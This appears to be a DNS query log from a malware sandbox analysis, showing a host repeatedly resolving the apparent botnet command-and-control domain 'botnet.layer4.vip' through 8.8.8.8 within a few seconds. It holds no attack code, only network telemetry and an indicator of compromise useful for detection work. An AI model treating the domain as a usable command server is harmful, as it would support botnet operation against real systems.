                                  Apr 9, 2023 03:32:11.091815948 CEST192.168.2.238.8.8.80x9891Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.107649088 CEST192.168.2.238.8.8.80x9891Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.131633997 CEST192.168.2.238.8.8.80x9891Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.147578001 CEST192.168.2.238.8.8.80x164fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.171669006 CEST192.168.2.238.8.8.80x164fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.187473059 CEST192.168.2.238.8.8.80x164fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.211544991 CEST192.168.2.238.8.8.80x164fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.235635042 CEST192.168.2.238.8.8.80x164fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.251168966 CEST192.168.2.238.8.8.80x4efcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.275625944 CEST192.168.2.238.8.8.80x4efcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.299757957 CEST192.168.2.238.8.8.80x4efcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.315545082 CEST192.168.2.238.8.8.80x4efcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.330996990 CEST192.168.2.238.8.8.80x4efcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.346869946 CEST192.168.2.238.8.8.80xdda3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.371295929 CEST192.168.2.238.8.8.80xdda3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.386760950 CEST192.168.2.238.8.8.80xdda3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.402599096 CEST192.168.2.238.8.8.80xdda3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.426767111 CEST192.168.2.238.8.8.80xdda3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.450944901 CEST192.168.2.238.8.8.80x2b35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.466777086 CEST192.168.2.238.8.8.80x2b35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.490799904 CEST192.168.2.238.8.8.80x2b35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.506266117 CEST192.168.2.238.8.8.80x2b35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.521853924 CEST192.168.2.238.8.8.80x2b35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.537416935 CEST192.168.2.238.8.8.80x5a20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.553178072 CEST192.168.2.238.8.8.80x5a20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.577284098 CEST192.168.2.238.8.8.80x5a20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.601284981 CEST192.168.2.238.8.8.80x5a20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.616790056 CEST192.168.2.238.8.8.80x5a20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.641185045 CEST192.168.2.238.8.8.80xb6eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.656671047 CEST192.168.2.238.8.8.80xb6eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.672537088 CEST192.168.2.238.8.8.80xb6eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.688107967 CEST192.168.2.238.8.8.80xb6eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.712233067 CEST192.168.2.238.8.8.80xb6eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.728070974 CEST192.168.2.238.8.8.80x1cccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.743658066 CEST192.168.2.238.8.8.80x1cccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.767745018 CEST192.168.2.238.8.8.80x1cccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.783282042 CEST192.168.2.238.8.8.80x1cccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.799216032 CEST192.168.2.238.8.8.80x1cccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.814841032 CEST192.168.2.238.8.8.80x390dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.830590010 CEST192.168.2.238.8.8.80x390dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.854634047 CEST192.168.2.238.8.8.80x390dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.870228052 CEST192.168.2.238.8.8.80x390dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.894370079 CEST192.168.2.238.8.8.80x390dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.910043955 CEST192.168.2.238.8.8.80xf697Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.925674915 CEST192.168.2.238.8.8.80xf697Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.941325903 CEST192.168.2.238.8.8.80xf697Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.965414047 CEST192.168.2.238.8.8.80xf697Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.981364012 CEST192.168.2.238.8.8.80xf697Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:11.997102022 CEST192.168.2.238.8.8.80xb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.012777090 CEST192.168.2.238.8.8.80xb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.037384033 CEST192.168.2.238.8.8.80xb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.061903000 CEST192.168.2.238.8.8.80xb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.086091042 CEST192.168.2.238.8.8.80xb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.110368013 CEST192.168.2.238.8.8.80x543cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.134649992 CEST192.168.2.238.8.8.80x543cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.159257889 CEST192.168.2.238.8.8.80x543cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.174870014 CEST192.168.2.238.8.8.80x543cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.199400902 CEST192.168.2.238.8.8.80x543cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.215423107 CEST192.168.2.238.8.8.80xdd22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.230968952 CEST192.168.2.238.8.8.80xdd22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.255300999 CEST192.168.2.238.8.8.80xdd22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.279377937 CEST192.168.2.238.8.8.80xdd22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.294990063 CEST192.168.2.238.8.8.80xdd22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.310638905 CEST192.168.2.238.8.8.80xef8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.334753990 CEST192.168.2.238.8.8.80xef8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.358937979 CEST192.168.2.238.8.8.80xef8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.383435965 CEST192.168.2.238.8.8.80xef8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.407494068 CEST192.168.2.238.8.8.80xef8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.431895018 CEST192.168.2.238.8.8.80x2531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.447662115 CEST192.168.2.238.8.8.80x2531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.463495016 CEST192.168.2.238.8.8.80x2531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.479398966 CEST192.168.2.238.8.8.80x2531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.495131969 CEST192.168.2.238.8.8.80x2531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.519185066 CEST192.168.2.238.8.8.80x18b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.535099983 CEST192.168.2.238.8.8.80x18b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.550851107 CEST192.168.2.238.8.8.80x18b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.575248957 CEST192.168.2.238.8.8.80x18b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.599594116 CEST192.168.2.238.8.8.80x18b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.623759031 CEST192.168.2.238.8.8.80xe197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.639182091 CEST192.168.2.238.8.8.80xe197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.654962063 CEST192.168.2.238.8.8.80xe197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.670859098 CEST192.168.2.238.8.8.80xe197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.686544895 CEST192.168.2.238.8.8.80xe197Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.711040020 CEST192.168.2.238.8.8.80x40f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.726552010 CEST192.168.2.238.8.8.80x40f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.742429972 CEST192.168.2.238.8.8.80x40f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.758220911 CEST192.168.2.238.8.8.80x40f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.782365084 CEST192.168.2.238.8.8.80x40f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.806591988 CEST192.168.2.238.8.8.80xeebcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.822526932 CEST192.168.2.238.8.8.80xeebcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.838335037 CEST192.168.2.238.8.8.80xeebcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.863028049 CEST192.168.2.238.8.8.80xeebcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.878598928 CEST192.168.2.238.8.8.80xeebcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.903271914 CEST192.168.2.238.8.8.80x11c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.927473068 CEST192.168.2.238.8.8.80x11c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.951968908 CEST192.168.2.238.8.8.80x11c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.967925072 CEST192.168.2.238.8.8.80x11c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:12.991868973 CEST192.168.2.238.8.8.80x11c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.015901089 CEST192.168.2.238.8.8.80x47d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.040034056 CEST192.168.2.238.8.8.80x47d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.055869102 CEST192.168.2.238.8.8.80x47d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.071708918 CEST192.168.2.238.8.8.80x47d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.087593079 CEST192.168.2.238.8.8.80x47d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.103131056 CEST192.168.2.238.8.8.80xfe30Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.118602991 CEST192.168.2.238.8.8.80xfe30Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.142736912 CEST192.168.2.238.8.8.80xfe30Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.158221960 CEST192.168.2.238.8.8.80xfe30Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.173619986 CEST192.168.2.238.8.8.80xfe30Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.198061943 CEST192.168.2.238.8.8.80xdbc5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.222125053 CEST192.168.2.238.8.8.80xdbc5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.246638060 CEST192.168.2.238.8.8.80xdbc5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.262290955 CEST192.168.2.238.8.8.80xdbc5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.277878046 CEST192.168.2.238.8.8.80xdbc5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.302109957 CEST192.168.2.238.8.8.80x3ff1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.317940950 CEST192.168.2.238.8.8.80x3ff1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.333755016 CEST192.168.2.238.8.8.80x3ff1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.349647999 CEST192.168.2.238.8.8.80x3ff1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.374020100 CEST192.168.2.238.8.8.80x3ff1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.389652014 CEST192.168.2.238.8.8.80x84d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.413759947 CEST192.168.2.238.8.8.80x84d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.438040972 CEST192.168.2.238.8.8.80x84d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.453659058 CEST192.168.2.238.8.8.80x84d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.469201088 CEST192.168.2.238.8.8.80x84d4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.493364096 CEST192.168.2.238.8.8.80xbe79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.509118080 CEST192.168.2.238.8.8.80xbe79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.525017023 CEST192.168.2.238.8.8.80xbe79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.549098015 CEST192.168.2.238.8.8.80xbe79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.573220015 CEST192.168.2.238.8.8.80xbe79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.597752094 CEST192.168.2.238.8.8.80x7914Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.613236904 CEST192.168.2.238.8.8.80x7914Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.628810883 CEST192.168.2.238.8.8.80x7914Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.644712925 CEST192.168.2.238.8.8.80x7914Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.660552025 CEST192.168.2.238.8.8.80x7914Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.684815884 CEST192.168.2.238.8.8.80x82e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.709222078 CEST192.168.2.238.8.8.80x82e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.733261108 CEST192.168.2.238.8.8.80x82e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.749116898 CEST192.168.2.238.8.8.80x82e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.764699936 CEST192.168.2.238.8.8.80x82e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.780373096 CEST192.168.2.238.8.8.80x34e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.796283960 CEST192.168.2.238.8.8.80x34e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.812069893 CEST192.168.2.238.8.8.80x34e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.827843904 CEST192.168.2.238.8.8.80x34e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.843492031 CEST192.168.2.238.8.8.80x34e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.867710114 CEST192.168.2.238.8.8.80x8a31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.891729116 CEST192.168.2.238.8.8.80x8a31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.907604933 CEST192.168.2.238.8.8.80x8a31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.931780100 CEST192.168.2.238.8.8.80x8a31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.955828905 CEST192.168.2.238.8.8.80x8a31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:13.979965925 CEST192.168.2.238.8.8.80xe0a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.004451036 CEST192.168.2.238.8.8.80xe0a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.020787954 CEST192.168.2.238.8.8.80xe0a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.045212030 CEST192.168.2.238.8.8.80xe0a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.069642067 CEST192.168.2.238.8.8.80xe0a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.094172955 CEST192.168.2.238.8.8.80xf541Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.118227005 CEST192.168.2.238.8.8.80xf541Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.143184900 CEST192.168.2.238.8.8.80xf541Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.158765078 CEST192.168.2.238.8.8.80xf541Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.174269915 CEST192.168.2.238.8.8.80xf541Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.191313028 CEST192.168.2.238.8.8.80xf0feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.215694904 CEST192.168.2.238.8.8.80xf0feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.240179062 CEST192.168.2.238.8.8.80xf0feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.255747080 CEST192.168.2.238.8.8.80xf0feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.271722078 CEST192.168.2.238.8.8.80xf0feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.287440062 CEST192.168.2.238.8.8.80x78f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.303389072 CEST192.168.2.238.8.8.80x78f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.319242001 CEST192.168.2.238.8.8.80x78f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.335695028 CEST192.168.2.238.8.8.80x78f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.351608992 CEST192.168.2.238.8.8.80x78f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.368319035 CEST192.168.2.238.8.8.80xc5f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.393657923 CEST192.168.2.238.8.8.80xc5f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.410128117 CEST192.168.2.238.8.8.80xc5f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.427387953 CEST192.168.2.238.8.8.80xc5f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.451529980 CEST192.168.2.238.8.8.80xc5f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.476156950 CEST192.168.2.238.8.8.80x23afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.494185925 CEST192.168.2.238.8.8.80x23afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.510065079 CEST192.168.2.238.8.8.80x23afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.534298897 CEST192.168.2.238.8.8.80x23afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.563785076 CEST192.168.2.238.8.8.80x23afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.588128090 CEST192.168.2.238.8.8.80x2ff2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.618163109 CEST192.168.2.238.8.8.80x2ff2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.634057045 CEST192.168.2.238.8.8.80x2ff2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.654999018 CEST192.168.2.238.8.8.80x2ff2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.679689884 CEST192.168.2.238.8.8.80x2ff2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.709424019 CEST192.168.2.238.8.8.80x4101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.725013971 CEST192.168.2.238.8.8.80x4101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.740991116 CEST192.168.2.238.8.8.80x4101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.756625891 CEST192.168.2.238.8.8.80x4101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.772542953 CEST192.168.2.238.8.8.80x4101Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.788587093 CEST192.168.2.238.8.8.80xad19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.814907074 CEST192.168.2.238.8.8.80xad19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.830614090 CEST192.168.2.238.8.8.80xad19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.854999065 CEST192.168.2.238.8.8.80xad19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.879416943 CEST192.168.2.238.8.8.80xad19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.903610945 CEST192.168.2.238.8.8.80xf1d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.919091940 CEST192.168.2.238.8.8.80xf1d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.943413973 CEST192.168.2.238.8.8.80xf1d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:14.958894014 CEST192.168.2.238.8.8.80xf1d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
